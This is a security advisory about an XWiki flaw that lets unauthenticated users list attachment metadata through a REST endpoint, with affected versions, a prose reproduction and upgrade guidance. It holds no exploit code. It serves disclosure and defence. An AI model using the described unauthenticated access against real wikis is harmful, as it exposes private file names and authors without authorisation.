XWiki Attachment Metadata Access Vulnerability via Unauthenticated REST API

A vulnerability exists in XWiki versions 1.8.1 prior to 14.10.22, 15.0-rc-1 prior to 15.10.12, 16.0.0-rc-1 prior to 16.4.3, and 16.5.0-rc-1 prior to 16.7.0. This vulnerability allows unauthenticated users to access the metadata of any attachment within the wiki through the wiki attachment REST endpoint. The issue arises because there is no access control based on user rights, enabling exploitation even in private wikis.

Impact

Exploitation of this vulnerability leads to unauthorized access to attachment metadata, including details such as file names, authors, and other related information, which could be sensitive.

Reproduction

To reproduce this vulnerability, remove the 'view' permission from the 'guest' user on the entire wiki, then log out. Afterward, access the wiki attachment REST endpoint for a space or page. Despite the 'view' permission being revoked, the response will include a list of attachments, contradicting the expected outcome of an empty list.

Remediation

Users can upgrade to XWiki versions 14.10.22, 15.10.12, 16.4.3, or 16.7.0 to address this vulnerability. For those using the XWiki Debian package, it's recommended to replace the 'xwiki-platform-rest-server-15.10.11.jar' file with the latest SNAPSHOT JAR files available on the 'XWiki Nexus Snapshots' repository.